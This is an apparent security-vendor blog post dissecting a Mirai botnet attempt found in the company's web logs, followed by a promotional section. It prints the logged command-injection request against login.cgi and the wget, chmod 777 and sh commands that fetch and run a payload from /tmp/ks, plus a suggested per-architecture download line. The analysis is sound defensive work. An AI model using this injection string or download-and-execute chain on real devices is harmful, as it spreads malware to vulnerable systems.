f you have run a web server of any kind, then you have likely seen some odd log entries. Those entries could be attributed to a crawler, typo or an attack. This week at Automox, we saw a very interesting entry in our logs. This entry was so intriguing that it immediately grabbed the attention of our Director of Infrastructure, CTO, and CISO. After some excited conversations back and forth via Slack, we got the payload and we determined it was…

The Attack

In our web server logs we saw the attacker was trying to run a number of commands in a row exploiting a weakness in an authentication page that allowed users to run arbitrary commands on the web server.

/login.cgi?cli=aa%20aa%27;wget%20http://;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1"

Worth noting here is that we do not have anything with mod_cgi running in our infrastructure. This means this type of attack would have never worked, and would have returned a 404 to the attacker. The attacker was trying to run a wget to download a payload, and execute it. Obviously, you do not want to download that payload in to your host. So, the first step was to spin up a VM and get down to business.

By looking at the URL below, you’ll see that it downloads a file, chmods it, and runs it:

wget -O /tmp/ks
chmod 777 /tmp/ks
sh /tmp/ks

Using wget in our VM, we downloaded the file:

The Payload: Part 1

The first part of the payload is a script. The script contacts the server again, and downloads an attack for each architecture it may be running on:

Well, well...this is just sloppy coding! Why not run `uname -m` and do a wget http://badsite/`uname -m`?

Using wget we get the payload.

The Payload: Part 2

Now that the file is on the server, the script executes it and launches the malware. Obviously, we did not want to run that. So, what was the attack? To determine, we created a hash and passed it to VirusTotal:

The results told us that it was Mirai:

Interestingly enough, in the twenty hours that have passed between when I first saw the log entry and did this write up, it has been detected 7 more times. Therefore, it must be a new variant:


This was a Mirai attack. This type of attack would only work on devices with a web application using CGI and it would allow commands to be run by an non-authenticated user. Mirai has been out for nearly two years now and we are still seeing new variants being released. This just reinforces the need to be vigilant about overall security hygiene. Certainly do not run your web application as root, make sure to patch your OS, and frequently change passwords to protect your infrastructure. As in the case of Mirai, do not expose your configuration web page to the public internet.

About Automox

Facing growing threats and a rapidly expanding attack surface, understaffed and alert-fatigued organizations need more efficient ways to eliminate their exposure to vulnerabilities. Automox is a modern cyber hygiene platform that closes the aperture of attack by more than 80% with just half the effort of traditional solutions.

Cloud-native and globally available, Automox enforces OS & third-party patch management, security configurations, and custom scripting across Windows, Mac, and Linux from a single intuitive console. IT and SecOps can quickly gain control and share visibility of on-prem, remote and virtual endpoints without the need to deploy costly infrastructure.

Experience modern, cloud-native patch management today with a 15-day free trial of Automox and start recapturing more than half the time you're currently spending on managing your attack surface. Automox dramatically reduces corporate risk while raising operational efficiency to deliver best-in-class security outcomes, faster and with fewer resources.

More posts like this: